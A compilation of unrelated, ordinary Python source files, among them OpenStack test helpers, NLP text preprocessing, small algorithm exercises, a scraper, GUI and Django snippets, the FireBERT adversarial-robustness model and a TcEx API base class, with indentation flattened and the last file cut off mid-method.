# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
def setUp(self):
super(BaseTestCase, self).setUp()
if not self.setUpClassCalled:
raise RuntimeError("setUpClass did not call the super's"
" setUpClass in the "
+ self.__class__.__name__)
test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
try:
test_timeout = int(test_timeout)
except ValueError:
test_timeout = 0
if test_timeout > 0:
self.useFixture(fixtures.Timeout(test_timeout, gentle=True))
if (os.environ.get('OS_STDOUT_CAPTURE') == 'True' or
os.environ.get('OS_STDOUT_CAPTURE') == '1'):
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
if (os.environ.get('OS_STDERR_CAPTURE') == 'True' or
os.environ.get('OS_STDERR_CAPTURE') == '1'):
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
if (os.environ.get('OS_LOG_CAPTURE') != 'False' and
os.environ.get('OS_LOG_CAPTURE') != '0'):
log_format = '%(asctime)-15s %(message)s'
self.useFixture(fixtures.LoggerFixture(nuke_handlers=False,
format=log_format))
# import pdb;pdb.set_trace()
# logger = self.useFixture(log.Contrail_Logger(cls.__name__))
#
def cleanUp(self):
super(BaseTestCase, self).cleanUp()
def addDetail(self, logfile, text):
if type(text) is str:
super(BaseTestCase, self).addDetail(logfile,
content.text_content(text))
else:
super(BaseTestCase, self).addDetail(logfile, text)
def is_test_applicable(self):
return (True, None)
# License: Apache-2.0
# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
def call_until_true(func, duration, sleep_for):
"""
Call the given function until it returns True (and return True) or
until the specified duration (in seconds) elapses (and return
False).
:param func: A zero argument callable that returns True on success.
:param duration: The number of seconds for which to attempt a
successful call of the function.
:param sleep_for: The number of seconds to sleep after an unsuccessful
invocation of the function.
"""
now = time.time()
timeout = now + duration
while now < timeout:
if func():
return True
LOG.debug("Sleeping for %d seconds", sleep_for)
time.sleep(sleep_for)
now = time.time()
return False
|
import pandas as pd
from sklearn.utils import shuffle
from nltk.corpus import stopwords
from nltk import punkt
import numpy as np
import re, random
from nltk.chunk import RegexpParser
import nltk, scipy, emoji
from nltk.corpus import wordnet
import csv, sys, random, math, re, itertools
from nltk.tokenize import TweetTokenizer
from nltk import word_tokenize
tknzr = TweetTokenizer()
CONTRACTIONS = {
" aint": " am not",
"ain't": "am not",
"aren't": "are not",
" arent": " are not",
"can't": "cannot",
" cant": " cannot",
"can't've": "cannot have",
" cant've": " cannot have",
"'cause": "because",
"could've": "could have",
"couldn't": "could not",
" couldnt": " could not",
"couldn't've": "could not have",
"didn't": "did not",
" didnt": " did not",
"doesn't": "does not",
" doesnt": " does not",
"don't": "do not",
" dont": " do not",
"hadn't": "had not",
" hadnt": " had not",
"hadn't've": "had not have",
"hasn't": "has not",
"haven't": "have not",
"he'd": "he would",
"he'd've": "he would have",
"he'll": "he will",
"he'll've": "he will have",
"he's": "he is",
"how'd": "how did",
"how'd'y": "how do you",
"how'll": "how will",
"how's": "how is",
"I'd": "I would",
"I'd've": "I would have",
"I'll": "I will",
"I'll've": "I will have",
"I'm": "I am",
"I've": "I have",
"isn't": "is not",
"isnt": "is not",
"it'd": "it would",
"it'd've": "it would have",
"it'll": "it will",
"it'll've": "it will have",
"it's": "it is",
"let's": "let us",
"ma'am": "madam",
"mayn't": "may not",
"might've": "might have",
"mightn't": "might not",
"mightn't've": "might not have",
"must've": "must have",
"mustn't": "must not",
"mustn't've": "must not have",
"needn't": "need not",
"needn't've": "need not have",
"o'clock": "of the clock",
"oughtn't": "ought not",
"oughtn't've": "ought not have",
"shan't": "shall not",
"sha'n't": "shall not",
"shan't've": "shall not have",
"she'd": "she would",
"she'd've": "she would have",
"she'll": "she will",
"she'll've": "she will have",
"she's": "she is",
"should've": "should have",
"shouldn't": "should not",
"shouldn't've": "should not have",
"so've": "so have",
"so's": "so is",
"that'd": "that had",
"that'd've": "that would have",
"that's": "that is",
"there'd": "there would",
"there'd've": "there would have",
"there's": "there is",
"they'd": "they would",
"they'd've": "they would have",
"they'll": "they will",
"they'll've": "they will have",
"they're": "they are",
"they've": "they have",
"to've": "to have",
"wasn't": "was not",
"we'd": "we would",
"we'd've": "we would have",
"we'll": "we will",
"we'll've": "we will have",
"we're": "we are",
"we've": "we have",
"weren't": "were not",
"what'll": "what will",
"what'll've": "what will have",
"what're": "what are",
"what's": "what is",
"what've": "what have",
"when's": "when is",
"when've": "when have",
"where'd": "where did",
"where's": "where is",
"where've": "where have",
"who'll": "who will",
"who'll've": "who will have",
"who's": "who is",
"who've": "who have",
"why's": "why is",
"why've": "why have",
"will've": "will have",
"won't": "will not",
"won't've": "will not have",
"would've": "would have",
"wouldn't": "would not",
"wouldn't've": "would not have",
"y'all": "you all",
"y'all'd": "you all would",
"y'all'd've": "you all would have",
"y'all're": "you all are",
"y'all've": "you all have",
"you'd": "you would",
"you'd've": "you would have",
"you'll": "you will",
"you'll've": " you will have",
"you're": "you are",
"you've": "you have"
}
def remove_adjacent_duplicates(word_list):
curr = None
new_word_list = []
for i in range(len(word_list)):
if curr is None:
curr = word_list[i]
new_word_list.append(curr)
continue
if word_list[i] != curr:
curr = word_list[i]
new_word_list.append(curr)
return new_word_list
def remove_adjacent_duplicates_fromline(line):
#word_list = nltk.word_tokenize(line.split()
tknzr = TweetTokenizer()
word_list = tknzr.tokenize(line)
#new_word_list = [word for word in word_list if len(word) > 2]
return ' '.join(remove_adjacent_duplicates(word_list))
def preprocess_1(sentence):
if type(sentence) != str:
return ""
sentence = (sentence.encode('ascii', 'ignore')).decode("utf-8")
# URLs
sentence = re.sub(r'http\S+', ' <URL> ', sentence)
# emoji
for c in sentence:
if c in emoji.UNICODE_EMOJI:
sentence = re.sub(c, emoji.demojize(c), sentence)
sentence = re.sub("([!]){1,}", " ! ", sentence)
sentence = re.sub("([.]){1,}", " . ", sentence)
sentence = re.sub("([?]){1,}", " ? ", sentence)
sentence = re.sub("([;]){1,}", " ; ", sentence)
sentence = re.sub("([:]){2,}", " : ", sentence)
# numerical values
#sentence = re.sub("[-+]?[.\d]*[\d]+[:,.\d]*", " <NUMBER> ", sentence)
# convert words such as "goood" to "good"
sentence = ''.join(''.join(s)[:2] for _, s in itertools.groupby(sentence))
# symbols
sentence = re.sub('&', " and ", sentence)
# convert to lower case
words = tknzr.tokenize(sentence)
# expand contractions
words = [CONTRACTIONS[word] if word in CONTRACTIONS else word for word in words]
sentence = " ".join(words)
sentence = re.sub('[^ a-zA-Z0-9.!?:;<>_#@]', ' ', sentence)
sentence = re.sub('\s+', ' ', sentence)
return remove_adjacent_duplicates_fromline(sentence) |
from schema import And, Schema, Use
from box import Box
import json
def tolerant_schema(s):
return Schema(s, ignore_extra_keys=True)
def not_empty(x):
return bool(x)
encoded_bool = And(str, Use(json.loads), bool)
encoded_int = And(str, Use(json.loads), int)
non_empty_string = And(str, not_empty)
def box(properties, *, schema):
return Box(schema.validate(properties), camel_killer_box=True, default_box=True, default_box_attr=None)
|
'''implementation of radix sort for integers'''
def radixSort(arr, radix=10):
'''radix sort method'''
shift = 1
buckets = [[] for _ in range(radix)]
done = False
while not done:
done = True
for x in arr:
val = (x / shift) % radix
buckets[val].append(x)
if val > 0:
done = False
index = 0
for i, bucket in enumerate(buckets):
for x in bucket:
arr[index] = x
index += 1
buckets[i] = []
shift *= radix
return arr
def test_radixSort():
'test for radixSort'
from random import randint
inp = [randint(0, 100) for _ in range(20)]
sinp = sorted(inp)
assert sinp == radixSort(inp)
print 'Test passed'
if __name__ == '__main__':
test_radixSort()
|
# -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2016-05-09 16:12:04
# @Last modified by: WuLC
# @Last Modified time: 2016-05-09 16:13:03
# @Email: liangchaowu5@gmail.com
# DP
class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
m = len(obstacleGrid)
n = len(obstacleGrid[0])
dp = [[0 for i in xrange(n)] for j in xrange(m)]
rb,cb=False,False # check if the first row or column is blocked or not
for i in xrange(m):
for j in xrange(n):
if obstacleGrid[i][j] == 1:
if i==0:
rb = True
if j==0:
cb = True
continue
elif i==0 or j==0:
if (i==0 and rb) or (j==0 and cb):
continue
else:
dp[i][j] = 1
else:
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return dp[m-1][n-1]
|
class TokenSplitter:
def __init__(self):
pass
def get_min_length(self, sentence, dict):
minimum_len = 0
if len(sentence) > max(dict.keys()):
minimum_len = max(dict.keys())
else:
minimum_len = len(sentence)
return minimum_len
def token_analyser(self, sentence, dict, en_fa):
minimum_len = self.get_min_length(sentence, dict)
new_tokens = ""
while sentence:
if sentence[:minimum_len] in dict.get(minimum_len, ''):
new_tokens += sentence[:minimum_len] + " "
sentence = sentence.replace(sentence[:minimum_len], '')
minimum_len = self.get_min_length(sentence, dict)
else:
minimum_len -= 1
if minimum_len == 0:
if not en_fa:
new_tokens = "Error"
else:
new_tokens = "خطا"
break
return new_tokens
def splite_english(self):
token_array = []
merged_token_array = []
english_dict = dict()
with open("en.tokens.en", "r", encoding="utf8") as en_tokens:
token_array = en_tokens.read().splitlines()
with open("mergedTokens.en", "r", encoding="utf8") as en_merged_tokens:
merged_token_array = en_merged_tokens.read().splitlines()
for splited_word in token_array:
if len(splited_word) in english_dict:
english_dict[len(splited_word)].append(splited_word)
else:
english_dict[len(splited_word)] = [splited_word]
with open('output/english_splited_token.txt', 'w+') as english_output:
for sentence in merged_token_array:
english_output.write("{} : {} \n".format(sentence, self.token_analyser(sentence, english_dict, 0)))
def splite_farsi(self):
merged_token_array = []
farsi_dict = dict()
with open("fa.words.txt", "r", encoding="utf8") as fa_tokens:
for line in fa_tokens:
w = line.strip('\n').split('\t')[0]
if len(w) in farsi_dict:
farsi_dict[len(w)].append(w)
else:
farsi_dict[len(w)] = [w]
with open("mergedTokens.fa", "r", encoding="utf8") as fa_merged_tokens:
merged_token_array = fa_merged_tokens.read().splitlines()
with open('output/farsi_splited_token.txt', 'w+', encoding="utf8") as farsi_output:
for sentence in merged_token_array:
farsi_output.write("{} : {} \n".format(sentence, self.token_analyser(sentence, farsi_dict, 1)))
if __name__ == "__main__":
sp = TokenSplitter()
sp.splite_english()
sp.splite_farsi()
|
from colorama import Fore, Back, Style,init
init()
print(Fore.RED + 'some red text')
print(Back.GREEN + 'and with a green background')
print(Style.DIM + 'and in dim text')
print(Style.RESET_ALL)
print('back to normal now')
example= input()
if example==None or example=='' :
print(Fore.CYAN+'ALARM!!!!!!!!!!!!!')
print('1')
print (example) |
#!/usr/bin/env python
import requests
from bs4 import BeautifulSoup
import cPickle as pickle
from time import sleep
def main():
with open("pop.pkl", 'rb') as f:
states = pickle.load(f)
url = "http://www.brewersassociation.org/statistics/by-state/"
with open('states.txt', 'w') as f:
for state in states:
payload = {'state': state}
request = requests.get(url, params=payload)
states[state]['craft_breweries'] = get_brewery_count(request.text)
print(states[state])
f.write("{name},{abbr},{pop},{breweries}\n"
.format(name=states[state]['name'], abbr=state,
pop=states[state]['population'],
breweries=states[state]['craft_breweries']))
sleep(5)
def get_brewery_count(state):
try:
page = BeautifulSoup(state)
total_div = page.find("div", class_="total")
total = total_div.find("span", class_="count")
except AttributeError:
return 0
return int(total.getText())
if __name__ == '__main__':
main()
|
from tkinter import *
import wikipedia
def get_me():
entry_value = entry.get()
answer.delete(1.0,END)
try:
answer_value = wikipedia.summary(entry_value)
answer.insert(INSERT,answer_value)
except:
answer.insert(INSERT,"check input OR internet connection")
root = Tk()
root.title("Search")
top_frame = Frame(root)
bottom_frame = Frame(root)
#top_frame
entry = Entry(top_frame,width=30)
entry.pack()
button = Button(top_frame,text="Search",bg="grey",fg="black",command=get_me)
button.pack(side=RIGHT)
#bottom_frame
scroll = Scrollbar(bottom_frame)
scroll.pack(side =RIGHT,fill=Y)
answer = Text(bottom_frame,width=30,height=10, yscrollcommand = scroll.set,wrap=WORD)
scroll.config(command=answer.yview)
answer.pack()
top_frame.pack(side =TOP)
bottom_frame.pack(side=BOTTOM)
root.title("WikiPedia")
root.mainloop()
|
"""Post forms."""
from django import forms
from posts.models import Post
class PostForm(forms.ModelForm):
"""Post model forms."""
class Meta:
model = Post
fields = ('user', 'profile', 'title', 'photo')
widgets = {
'title': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Title',
}),
}
|
import sys
sys.stdin = open('동철이의일분배.txt','r')
def combo(deep, sofar):
global poten,N, max_poten
if sofar <= max_poten:
return
if deep==N:
if sofar > max_poten:
max_poten = sofar
return
for task in range(N):
if visited[task] ==0:
visited[task] =True
combo(deep+1, sofar*data[deep][task])
visited[task] = 0
T = int(input())
for time in range(T):
N = int(input())
max_poten = 0
visited = [0]*N
data=[]
for infos in range(N):
info = [ele*0.01 for ele in list(map(int,input().split()))]
data.append(info)
combo(0,1)
max_poten = max_poten*100
print('#',time+1," ", "%0.6f" % max_poten, sep='')
|
#day2
#part2
def have_one_diff(b1, b2):
num_diff = 0
for i in range(len(b1)):
if b1[i] != b2[i]:
num_diff += 1
if num_diff > 1:
return False
if num_diff == 1:
return True
def find_almost_match(box):
for i in range(len(box)):
box1 = box[i]
for j in range(i+1, len(box)):
box2 = box[j]
if have_one_diff(box1, box2):
return (box1, box2)
def print_similarities(match):
a = match[0]
b = match[1]
answer = ""
for i in range(len(a)):
if a[i] == b[i]:
answer += a[i]
print(answer)
box_ids = []
f = open("day2_input.txt", "r")
for x in f:
box_ids.append(x)
#find matches
matches = find_almost_match(box_ids)
#print the matches minus the single difference
print_similarities(matches)
"""
#part1
def analyze_text(x):
global num_doubles, num_triples
d = {}
for letter in x:
if letter in d: #letter has already been found
d[letter] += 1
else: #first occurance of this letter
d[letter] = 1
#search for doubles
if is_double_in_set(d):
num_doubles += 1
#search for triples
if is_triple_in_set(d):
num_triples += 1
def is_double_in_set(d):
for k,v in d.items():
if v == 2:
return True
return False
def is_triple_in_set(d):
for k,v in d.items():
if v == 3:
return True
return False
num_doubles = 0
num_triples = 0
f = open("day2_input.txt", "r")
for x in f:
analyze_text(x)
print(num_doubles * num_triples)
"""
|
# coding=utf-8
# Copyright 2020 Gunnar Mein, Kevin Hartman, Andrew Morris. All rights reserved.
#
# Licensed under the MIT license
# See https://github.com/FireBERT-NLP/FireBERT/blob/master/LICENSE for details
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# FVE as a subclass
# overrides extend_batch_examples_test() used in forward()
#
import torch
from torch import nn
import numpy as np
import argparse
from switch import SWITCH
from firebert_base import FireBERT_base
class FireBERT_FVE(FireBERT_base):
def __init__(self, load_from=None, processor=None, hparams=None):
super(FireBERT_FVE, self).__init__(load_from=load_from, processor=processor, hparams=hparams)
# need SWITCH to tell us what the important words are
self.switch = SWITCH(hparams=hparams, model=self, tokenizer=self.tokenizer, device=self.device)
# merge passed hparams over default hparams
hdict = self.get_default_hparams()
hdict.update(hparams)
self.hparams = argparse.Namespace(**hdict)
self.actualize_hparams()
return
# methods to set hparams on the fly
def update_hparams(self, new_hparams):
hdict = vars(self.hparams)
hdict.update(new_hparams)
self.hparams = argparse.Namespace(**hdict)
self.switch.update_hparams(new_hparams)
super().update_hparams(new_hparams)
self.actualize_hparams()
def actualize_hparams(self):
# remember some hparams a little better
self.count = self.hparams.vector_count
self.perturb_words = self.hparams.perturb_words
self.std = self.hparams.std
return
#
# here are some useful defaults
#
def get_default_hparams(self):
d = FireBERT_base.get_default_hparams(self)
d.update({
# these are for SWITCH
'use_USE':False,
'stop_words':True,
'perturb_words':2,
# this is for base
'verbose':False,
'vote_avg_logits':True,
# this is for us
'std':0.05,
'vector_count':10
})
return d
# this fills in the hook prepared in the base class
def extend_batch_examples_eval(self, input_ids=None, attention_mask=None, token_type_ids=None,
position_ids=None, head_mask=None, inputs_embeds=None, example_idx=None):
#print("FIVE: ex", example_idx.shape, "in",input_ids.shape)
group_ids = None
group_sizes = []
inputs_embeds_results = inputs_embeds
# we do need the examples for SWITCH
if example_idx is not None:
# let's get the embeddings for the original samples
inputs_embeds = self.bert.get_input_embeddings()(input_ids).detach()
inputs_embeds_results = inputs_embeds
# in groups, we keep track of samples tha belong together for voting
group_ids = list(range(0,len(example_idx)))
group_sizes = []
current_group = 0
# gotta go through one by one. Yes, batch logic is nicer, but SWICH is a one-by-one thing, anyway.
for i, idx in enumerate(example_idx):
example = self.test_examples[idx]
# call the perturbation method individually for each example
perturbed_inputs_embeds, sample_attention_mask, sample_token_type_ids, _, _, _ = \
self.perturb_example(example,
sample_index = i,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
# Put tensors together
# print("perturbed examples: ", perturbed_inputs_embeds[0])
if perturbed_inputs_embeds is None:
# didn't get any important words to perturb, so no batch extensions
group_sizes.append(1) # pus one for the original
else:
inputs_embeds_results = torch.cat((inputs_embeds_results, perturbed_inputs_embeds), dim=0)
attention_mask = torch.cat((attention_mask, sample_attention_mask), dim=0)
token_type_ids = torch.cat((token_type_ids, sample_token_type_ids), dim=0)
group_ids += [current_group]*(self.count)
group_sizes.append(self.count+1) # plus one for the original
current_group += 1
# need to erase the tokens (input_ids) so that BERT will use the embeddings
input_ids = None
# we probably received these as None, but if we don't set them to that, we might have to
# adjust them for the new batch size and that would be tedious
head_mask = None
position_ids = None
# won't need these anymore
example_idx = None
return input_ids, attention_mask, token_type_ids, position_ids, head_mask, inputs_embeds_results, example_idx, group_ids, group_sizes
#
# this perturbs an example and returns it in a batch with others
#
def perturb_example(self,example, count=None, std=None, sample_index=0, input_ids=None, attention_mask=None, token_type_ids=None):
if count is None:
count = self.count
if std is None:
std = self.std
if input_ids is None:
# convert example into features
input_ids, attention_mask, token_type_ids, _ = self.processor.create_feature_tensors([example], device=self.device)
sample_index = 0
# use SWITCH to figure out word importance within the list
word_indices, token_indices, word_list = \
self.switch.get_important_indices_from_example(example,
input_ids[sample_index].unsqueeze(0),
token_type_ids[sample_index].unsqueeze(0),
attention_mask[sample_index].unsqueeze(0))
# filter out useless stuff
word_indices = list(filter(lambda x:x!=-1, word_indices))
token_indices = list(filter(lambda x:x!=-1, token_indices))
# identify most important words
important_words = [word_list[i] for i in word_indices[:self.perturb_words]]
token_indices = token_indices[:self.perturb_words]
# get embeddings from BERT for the whole sample (set of words)
embeddings = self.bert.get_input_embeddings()(input_ids[sample_index]).detach()
#print("embeddings:",embeddings.shape)
#print(embeddings[0,:20])
batch = None
points = None
for token_index in token_indices:
# get the embedding vector for the most important word
v = embeddings[token_index].clone().detach()
#print("vector:", v.shape)
#print(v)
# scale the single sample set of tokens/embeddings up to a whole batch
batch = embeddings.repeat(count,1,1)
# hopefully give some GPU memory back
#del embeddings
# scatter a region around this vector
points = self.region_around(v, std=std, count=count)
#print("region:", points.shape)
#print(points[0])
#print("batch embeddings before clobber:",batch.shape)
#print(batch[0,:20])
# clobber the tensor for the region of perturbed vectors in there
batch[:,token_index,:] = points
#print("batch embeddings after clobber:",batch.shape)
#print(batch[0,:20])
attention_mask = attention_mask[sample_index].repeat(count, 1)
token_type_ids = token_type_ids[sample_index].repeat(count, 1)
return batch, attention_mask, token_type_ids, points, important_words, None
#
# helper methods
#
#
# make a field of Gaussian-perturbed vectors around a given vector v
#
def region_around(self, vector, std, count, device=None):
vectors = vector.repeat(count, 1)
#print("vectors:",vectors.shape)
region = torch.normal(mean=vectors, std=std).cpu()
#print("region:",region.shape)
return region
def get_single_vector(self, word):
#tbd
return None
def get_hparam(self, name):
return self.hparams[name]
#
# Tests.
#
def test_FireBERT_FVE(task, set, reps=1, sample=1, hparams_default={}, hparams_lists=None, lightning=''):
# prepare hyperparameters
hparams = hparams_default
# load the right processor class
if task == "MNLI":
processor = MnliProcessor({'sample_percent':sample}) # negative number means abs number of samples, not percent
elif task == "IMDB":
processor = ImdbProcessor({'sample_percent':sample})
# now instantiate the models
model = FireBERT_FVE(load_from='resources/models/'+task+lightning+'/pytorch_model.bin',
processor=processor,
hparams=hparams_default)
processor.set_tokenizer(model.tokenizer)
dataset, examples = processor.load_and_cache_examples("data/"+task, example_set=set)
model.set_test_dataset(dataset, examples)
#adv set
# load the right processor class
if task == "MNLI":
adv_processor = MnliProcessor({'sample_percent':sample}) # negative number means abs number of samples, not percent
elif task == "IMDB":
adv_processor = ImdbProcessor({'sample_percent':sample})
model_adv = FireBERT_FVE(load_from='resources/models/'+task+lightning+'/pytorch_model.bin',
processor=processor,
hparams=hparams_default)
adv_processor.set_tokenizer(model.tokenizer)
dataset_adv, examples_adv = adv_processor.load_and_cache_examples("data/"+task, example_set="adv_"+set)
model_adv.set_test_dataset(dataset_adv, examples_adv)
for i in range(reps):
if hparams_lists is None:
print("FireBERT_FVE specific test", task, set)
else:
print("FireBERT_FVE hparam test", task, set)
print("{")
for item in hparams_lists.items():
key = item[0]
values = item[1]
hparams[key] = random.choice(values)
print(" '"+key+"':",str(hparams[key])+",")
print("}")
# set the new hparams
model.update_hparams(hparams)
model_adv.update_hparams(hparams)
trainer = pl.Trainer(gpus=(-1 if torch.cuda.is_available() else None))
trainer.test(model)
result1 = trainer.tqdm_metrics
trainer = pl.Trainer(gpus=(-1 if torch.cuda.is_available() else None))
trainer.test(model_adv)
result2 = trainer.tqdm_metrics
f = open("results/five/hparams-results.csv", "a+")
print(task, ",", "adv_"+set, ",", sample, ',"',hparams,'",',result1['avg_test_acc'],",",result2['avg_test_acc'], sep="", file=f)
f.close()
print("iteration",i,"logged.")
elapsed_time()
print()
if hparams_lists is None:
break
def elapsed_time():
global t_start
t_now = time.time()
t = t_now-t_start
print("elapsed time: ",round(t,2), "s")
t_start = t_now
return t
if __name__ == "__main__":
import random
import time
import pytorch_lightning as pl
from processors import MnliProcessor, ImdbProcessor
t_start = time.time()
# prepare hyperparameters
hparams_default = {
'batch_size':8,
# these are for SWITCH
'use_USE':False,
'stop_words':True,
'perturb_words':2,
# this is for base
'verbose':False,
'vote_avg_logits':True,
# this is for us
'std':0.05,
'vector_count':10
}
hparams_lists = {
# these are for SWITCH
'stop_words':[True, False],
'perturb_words':range(1,20),
# this is for base
'vote_avg_logits':[True, False],
# this is for us
'std':np.arange(0.1,10,0.01),
'vector_count':range(3,15)
}
# parameter search
sample = 15
#test_FireBERT_FVE("IMDB", "dev", reps=500, sample=sample, hparams_default=hparams_default, hparams_lists=hparams_lists)
#test_FireBERT_FVE("MNLI", "dev", reps=500, sample=sample, hparams_default=hparams_default, hparams_lists=hparams_lists)
# Monday, on lightning model
best_IMDB_lightning = {'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
'verbose': False, 'vote_avg_logits': False, 'std': 8.4, 'vector_count': 11}
best_mnli_lightning = {'batch_size': 8, 'use_USE': False, 'stop_words': False, 'perturb_words': 1,
'verbose': False, 'vote_avg_logits': False, 'std': 2.31, 'vector_count': 8}
# Tuesday, on paper model
best_mnli = {'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
'verbose': False, 'vote_avg_logits': True, 'std': 8.14, 'vector_count': 8}
best_IMDB={'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
'verbose': False, 'vote_avg_logits': True, 'std': 2.29, 'vector_count': 10}
# actual test runs
#test_FireBERT_FVE("IMDB", "test", reps=1, sample=100, hparams_default=best_IMDB)
test_FireBERT_FVE("MNLI", "test", reps=1, sample=100, hparams_default=best_mnli)
|
#Escribe un programa que pida un número y escriba si primo o no
primo=int(input("Introduzca un número primo: "))
resultado=0
for i in range (1,primo):
if primo%i==0:
resultado+=1
if resultado==1:
print ("El número %d es primo." %(primo))
else:
print ("El número %d no es primo." %(primo))
|
#!/usr/bin/env python
#client example
import socket
import time
print "Waiting for socket"
time.sleep(3)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('java-server', 10001))
client_socket.send("hello")
client_socket.send(" stackoverflow")
client_socket.close()
while 1:
print "pending"
time.sleep(3)
pass # do nothing
|
"""TcEx Framework Module"""
# standard library
import logging
from abc import ABC
from collections.abc import Generator
from typing import Self
# third-party
from requests import Response, Session
from requests.exceptions import ProxyError, RetryError
# first-party
from tcex.api.tc.v3.object_collection_abc import ObjectCollectionABC
from tcex.api.tc.v3.tql.tql_operator import TqlOperator
from tcex.api.tc.v3.v3_model_abc import V3ModelABC
from tcex.exit.error_code import handle_error
from tcex.logger.trace_logger import TraceLogger
from tcex.pleb.cached_property import cached_property
from tcex.util import Util
# get tcex logger
_logger: TraceLogger = logging.getLogger(__name__.split('.', maxsplit=1)[0]) # type: ignore
class ObjectABC(ABC):
"""Object Abstract Base Class
This class is a base class for Object classes that use
multi-inheritance with a pydantic BaseModel class. To ensure
properties are not added to the model both @property and @setter
methods are used.
"""
def __init__(self, session: Session):
"""Initialize instance properties."""
self._session: Session = session
# properties
self._parent_data = {}
self._remove_objects = {
'associations': [],
'attributes': [],
'securityLabels': [],
'tags': [],
}
self.util = Util()
self.log = _logger
self.request: Response
# define/overwritten in child class
self._model: V3ModelABC
self._nested_field_name: str | None = None
self._nested_filter: str | None = None
self.type_: str
@property
def _api_endpoint(self) -> str: # pragma: no cover
"""Return the type specific API endpoint."""
raise NotImplementedError('Child class must implement this property.')
def _calculate_unique_id(self) -> dict[str, int | str]:
if self.model.id:
return {'filter': 'id', 'value': self.model.id}
if hasattr(self.model, 'xid') and self.model.xid: # type: ignore
return {'filter': 'xid', 'value': self.model.xid} # type: ignore
if self.type_.lower() in ['indicator']:
return {'filter': 'summary', 'value': self.model.summary} # type: ignore
return {}
def _iterate_over_sublist(
self, sublist_type: ObjectCollectionABC
) -> Generator[Self, None, None]:
"""Iterate over any nested collections."""
sublist = sublist_type(session=self._session) # type: ignore
# determine the filter type and value based on the available object fields.
unique_id_data = self._calculate_unique_id()
# add the filter (e.g., group.has_indicator.id(TqlOperator.EQ, 123)) for the parent object.
getattr(
getattr(sublist.filter, self._nested_filter), # type: ignore
unique_id_data.get('filter'), # type: ignore
)(TqlOperator.EQ, unique_id_data.get('value'))
# return the sub object, injecting the parent data
for obj in sublist:
obj._parent_data = {
'api_endpoint': self._api_endpoint,
'type': self.type_,
'unique_id': unique_id_data.get('value'),
}
yield obj
self.request = sublist.request
def _request(
self,
method: str,
url: str,
body: bytes | str | None = None,
params: dict | None = None,
headers: dict | None = None,
):
"""Handle standard request with error checking."""
try:
self.request = self._session.request(
method, url, data=body, headers=headers, params=params
)
if isinstance(self.request.request.body, str) and len(self.request.request.body) < 1000:
self.log.debug(f'feature=api-tc-v3, request-body={self.request.request.body}')
except (ConnectionError, ProxyError, RetryError): # pragma: no cover
handle_error(
code=951,
message_values=[
method.upper(),
None,
'{\"message\": \"Connection/Proxy Error/Retry\"}',
url,
],
)
content_type = self.request.headers.get('Content-Type')
if content_type == 'application/json' and not self.success(self.request):
err = self.request.text or self.request.reason
handle_error(
code=952,
message_values=[
(self.request.request.method or '').upper(),
self.request.status_code,
err,
self.request.url,
],
)
# log content for debugging
if content_type == 'application/json':
self.log_response_text(self.request)
@staticmethod
def _validate_id(id_: int | str | None, url: str):
"""Raise exception is id is not provided."""
if not id_: # pragma: no cover
message = '{"message": "No ID provided.", "status": "Error"}'
handle_error(code=952, message_values=['GET', '404', message, url])
@property
def as_entity(self) -> dict[str, str]: # pragma: no cover
"""Return the entity representation of the object."""
raise NotImplementedError('Child class must implement this property.')
@property
def available_fields(self) -> list[str]:
"""Return the available query param field names for this object."""
return [fd['name'] for fd in self.fields]
def create(self, params: dict | None = None) -> Response:
"""Create or Update the Case Management object.
This is determined based on if the id is already present in the object.
"""
method = 'POST'
body = self.model.gen_body_json(method=method)
params = self.gen_params(params) if params else None
self._request(
method,
self.url(method),
body,
headers={'content-type': 'application/json'},
params=params,
)
# get the response data from nested data object or full response
response_json = self.request.json()
# update the model with the response from the API
self.model = type(self.model)(**response_json.get('data'))
return self.request
def delete(self, params: dict | None = None):
"""Delete the object."""
method = 'DELETE'
body = self.model.gen_body_json(method)
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method, unique_id))
self._request(method, self.url(method, unique_id), body, params=params)
return self.request
@cached_property
def fields(self) -> list[dict[str, str]]:
"""Return the field data for this object."""
_fields = []
r = self._session.options(f'{self._api_endpoint}/fields', params={})
if r.ok:
_fields = r.json().get('data', [])
return _fields
def gen_params(self, params: dict) -> dict:
"""Return appropriate params values."""
# convert all keys to camel case
params = {self.util.snake_to_camel(k): v for k, v in params.items()}
# special parameter for indicators to enable the return the the indicator fields
# (value1, value2, value3) on std-custom/custom-custom indicator types.
if self.type_ == 'Indicator':
params.setdefault('fields', []).append('genericCustomIndicatorValues')
# add fields parameter if provided
if '_all_' in params.get('fields', []):
params['fields'] = list(self.available_fields)
return params
def get(
self,
object_id: int | None = None,
params: dict | None = None,
) -> Response:
"""Get the Case Management Object.
.. code-block:: python
:linenos:
:lineno-start: 1
# Example of params input
{
'result_limit': 100, # How many results are retrieved.
'result_start': 10, # Starting point on retrieved results.
'fields': ['caseId', 'summary'] # Additional fields returned on the results
}
Args:
object_id: The unique id of the object to be returned.
params: Dict of the params to be sent while retrieving the Artifacts objects.
"""
method = 'GET'
object_id = object_id or self.model.id
params = self.gen_params(params) if params else None
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method, unique_id))
body = self.model.gen_body_json(method)
